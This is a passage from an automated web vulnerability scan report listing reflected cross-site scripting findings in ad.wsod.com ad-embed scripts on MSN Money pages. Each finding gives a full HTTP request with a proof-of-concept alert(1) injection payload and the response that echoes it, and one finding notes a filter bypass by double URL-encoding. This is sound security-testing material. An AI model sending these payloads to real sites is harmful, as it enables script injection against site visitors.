Set-Cookie: i_1=33:1411:972:100:0:40771:1303843027:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       func
...[SNIP]...

5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f30'-alert(1)-'9293594230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:33 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:40771:1303843053:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write('<a href="//ad.wsod.com/click/8bec9b
...[SNIP]...

5.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49585"-alert(1)-"9386b35fba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843019**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92046"-alert(1)-"146c89c17b4 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843032**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79074"-alert(1)-"90cbbf22942 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942">
...[SNIP]...

5.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40e7"-alert(1)-"cba368c8dc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1303843036**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f was submitted in the REST URL parameter 2. This input was echoed as 600fc";alert(1)//f3cc9aebd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc";alert(1)//f3cc9aebd4f/1411.0.js.120x60/1303843048**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=089
...[SNIP]...

5.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5 was submitted in the REST URL parameter 3. This input was echoed as d9bf5";alert(1)//b0a835980d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5";alert(1)//b0a835980d5/1303843050**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c
...[SNIP]...

5.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31049"-alert(1)-"aab598a9703 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843028**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a8a"-alert(1)-"d8d13c332e8 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843023**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9ef"-alert(1)-"fca189d9ed0 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da8c"-alert(1)-"7e28ca43465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1">
...[SNIP]...

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c33'-alert(1)-'0a2fa29519b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
